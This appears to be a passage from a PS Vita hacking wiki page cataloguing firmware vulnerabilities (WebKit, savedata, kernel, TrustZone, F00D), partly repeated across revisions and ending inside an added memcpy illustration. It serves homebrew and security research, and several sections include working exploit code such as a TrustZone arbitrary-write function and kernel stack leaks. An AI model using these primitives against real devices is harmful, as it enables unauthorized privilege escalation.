[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The two bugs below are exploited by calling memcpy with a negative length, which allows an out-of-bounds access without copying an excessively large buffer or triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, adding it to dst wraps around and yields a value smaller than dst; as a consequence, the later comparison evaluates to false whether it is signed or unsigned, so memcpy believes there are fewer than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. Hence a negative length simply bypasses the copy loop.<br />
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution, the eMMC MBR can be modified to change the block size. However, at the time yifan was trying to exploit it with an adjacent malloc (controlled_size) and couldn't find a way, so he left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyz finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL: a function does not check an error return; if it did, the value corrupted by the buffer overflow would not have been used. Later on, the field that was written is used in a separate call.<br />
<br />
This allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A list of the 1.80 TrustZone modules' imports/exports is available: [[File:Psvita_1.80_tz_nids.txt]]<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
    // plant the 8 bytes in the Non-secure view of the shared region, at the<br />
    // offset (+0x28) the SMC reads from when sm_handle points at the region base<br />
    memcpy((void *)0x00400028, src, 8);<br />
<br />
    uintptr_t sm_handle = 0x00560000 >> 1;                  // Secure view of the same region, encoded as tz_addr >> 1<br />
    uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80; // block index such that base + index * 0x80 == dst<br />
<br />
    asm volatile(<br />
        "mov r0, %0\n\t"<br />
        "mov r1, %1\n\t"<br />
        "mov r12, #0x12F\n\t"<br />
        "smc #0\n\t"<br />
        : : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
    );<br />
}<br />
</source><br />
<br />
To achieve code execution, dst must be set to the SMC table address in order to plant two pointers (8 = 2*4 bytes).<br />
<br />
Patched somewhere after 1.80 and before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Boot ROM ===<br />
<br />
(2019-08-30) To be disclosed.<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check the source address and therefore provides an oracle that allows dumping memory. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code>, which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory), and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however, cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to reuse the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table whose entries all point to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it requires almost no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11479Vulnerabilities2019-08-31T15:42:09Z<p>Xyz: /* Secure World (TrustZone) */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz so that HENkaku can be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577,<ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using a NaN as the argument.<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts a user-defined JavaScript function and calls it from native code to compare array items. If this compare function reduces the array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it is allocated. If the mutated list contains fewer entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevertheless, a set of tricks allows installing and using PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in the PSVita OS. This can be bypassed only with a kernel exploit and the ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can therefore be installed using PKG Installer or the BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
The PSM developer license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
    public class AppMain<br />
    {<br />
        [SecurityCritical]<br />
        public static void Escalate (IAsyncResult result)<br />
        {<br />
            Console.WriteLine("Should be SecurityCritical");<br />
            IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
            Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
        }<br />
<br />
        public static void Main (string[] args)<br />
        {<br />
            Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
            Network.AuthGetTicket();<br />
            NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
            IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
            while (!result.IsCompleted)<br />
            {<br />
                Console.WriteLine("waiting...");<br />
            }<br />
            Console.WriteLine("Completed!");<br />
        }<br />
    }<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly so).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is that games developed with SDK 2.60 or lower were compiled as statically linked executables, so their loading address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also do not have stack protection enabled by default, which means that if we can smash the stack in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you just fuzz gamesaves by writing random data at random locations until you get a crash (the best bet is extending strings and hoping that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file; the game reads it line by line and copies the lines to a list of buffers. However, it doesn't validate the length, so if we put the delimiter \n far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. However, it is in the data section; luckily for us, the content after the buffer is actually the list that contains the destinations for the other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want, which gives us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC does not sanity-check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can secure the PSVita store as much as they want; we will always be able to activate as long as the PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate a PSVita, we only have to spoof the firmware version to bypass the FW Update popup, and spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall number passed in R12 can index past the end of the syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== syscall handler leaks syscall table vaddr ===<br />
<br />
When a syscall is invoked with an invalid syscall id, the SVC handler returns without clearing the syscall table vaddr left in r0.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 from a fself. Since at least firmware 1.030, it works only from WebKit exploits (not from fself or games, but maybe from ePSP or PSM).<br />
<br />
Call some functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get up to 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available, instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
          socket,<br />
          11,<br />
          flags_,<br />
          mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched in 3.68 or in firmwares just before it. These exploits are not usable on retail/testkit because the functions used are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
    uint32_t info[0x12];<br />
<br />
    // 1) Call a function that writes sp to kernel stack<br />
    sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
    // 2) Leak kernel stack<br />
    sceMotionDevGetEvaInfo(info);<br />
<br />
    // 3) Get sysmem base<br />
    uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
    return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least up to firmware 1.692) the voice definition address must not be XORed, or SCE_NGS_ERROR_INVALID will be returned by sceNgsRackGetRequiredMemorySize.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME value allows the kstack address to be found faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 // value specific to 1.692<br />
<br />
SceInt32 gRet = 0; // last return value of sceNgsRackGetRequiredMemorySize, kept for debugging<br />
<br />
// Plants a voice definition on the kernel stack via sceIoDevctl, then probes<br />
// candidate addresses page by page until sceNgsRackGetRequiredMemorySize<br />
// accepts one, which reveals the kernel stack address. Returns 0xFFFFFFF on failure.<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
    SceInt32 ret = 0;<br />
<br />
    SceNgsRackDescription rackDesc;<br />
    rackDesc.nChannelsPerVoice = 1;<br />
    rackDesc.nVoices = 1;<br />
    rackDesc.nMaxPatchesPerInput = 0;<br />
    rackDesc.nPatchesPerOutput = 1;<br />
<br />
    // fake voice definition that the devctl call copies onto the kernel stack<br />
    unsigned int voiceDef[0x400];<br />
    memset(voiceDef, 0x00, 0x400);<br />
    voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
    voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
    voiceDef[2] = 0x40;<br />
    voiceDef[3] = 0x40;<br />
    sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
    sceKernelDelayThread(2*1000*1000);<br />
<br />
    // the pointer is deliberately not XORed here (see the note above about old firmwares)<br />
    for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
    {<br />
        rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
        ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
        gRet = ret;<br />
        if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
            continue;<br />
        else<br />
            return (addr - DEVCTL_STACK_FRAME);<br />
    }<br />
    return 0xFFFFFFF;<br />
}<br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The two bugs below are exploited by calling memcpy with a negative length, which allows an out-of-bounds access without copying an excessively large buffer or triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, adding it to dst wraps around and yields a value smaller than dst; as a consequence, the later comparison evaluates to false whether it is signed or unsigned, so memcpy believes there are fewer than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. Hence a negative length simply bypasses the copy loop.<br />
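As an added illustration of the two memcpy bugs described above (constructed here; neither Sony's memcpy nor h-encore code), the C model below reproduces both decision points on 32-bit integer "addresses" and places a hardened length check beside them; the 32-byte threshold and the sample address 0x81000000 are assumptions taken from the description.<br />
<br />
```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed model of the two memcpy decision points discussed above.
 * Addresses are plain 32-bit integers so the wrap-around is visible on
 * any host; the 32-byte fast-path threshold is taken from the text. */

/* Bug 1: the "at least 32 bytes left" test is done on end = dst + len.
 * Returns 1 if the large-copy path is selected, 0 for the small path. */
int takes_large_copy_path(uint32_t dst, int32_t len)
{
    uint32_t end = dst + (uint32_t)len;            /* wraps when len < 0 */
    uint32_t limit = dst + 32u;
    int unsigned_cmp = end >= limit;
    int signed_cmp = (int32_t)end >= (int32_t)limit;
    /* With a negative len, end lands below dst, so both comparisons are false
     * (as long as dst + 32 itself does not cross the sign boundary) and memcpy
     * believes fewer than 32 bytes remain. */
    return unsigned_cmp || signed_cmp;
}

/* Bug 2: the byte loop compares its counter against len as a signed int,
 * so a negative len runs zero iterations. Returns the number of bytes copied. */
size_t signed_loop_copy(uint8_t *dst, const uint8_t *src, int32_t len)
{
    size_t copied = 0;
    for (int32_t i = 0; i < len; i++) {
        dst[i] = src[i];
        copied++;
    }
    return copied;
}

/* Hardened form: the length is unsigned and checked against the destination
 * capacity and against pointer wrap before any byte is moved.
 * Returns 1 on success, 0 when the request is rejected. */
int checked_copy(uint8_t *dst, size_t dst_cap, const uint8_t *src, size_t len)
{
    if (len > dst_cap)
        return 0;                                   /* would overrun dst */
    if ((uintptr_t)dst + len < (uintptr_t)dst)
        return 0;                                   /* pointer arithmetic wraps */
    for (size_t i = 0; i < len; i++)
        dst[i] = src[i];
    return 1;
}

/* Helpers that run the two copies on constructed 64-byte sample buffers
 * (only call them with |len| <= 64). */
size_t demo_signed_loop(int32_t len)
{
    uint8_t src[64], dst[64] = {0};
    for (int i = 0; i < 64; i++)
        src[i] = (uint8_t)i;
    return signed_loop_copy(dst, src, len);
}

int demo_checked_copy(size_t len)
{
    uint8_t src[64], dst[64] = {0};
    for (int i = 0; i < 64; i++)
        src[i] = (uint8_t)i;
    return checked_copy(dst, sizeof dst, src, len);
}

int main(void)
{
    printf("len=0x100  large path: %d\n", takes_large_copy_path(0x81000000u, 0x100));
    printf("len=-0x10  large path: %d\n", takes_large_copy_path(0x81000000u, -0x10));
    printf("signed loop with len=-16 copied %zu bytes\n", demo_signed_loop(-16));
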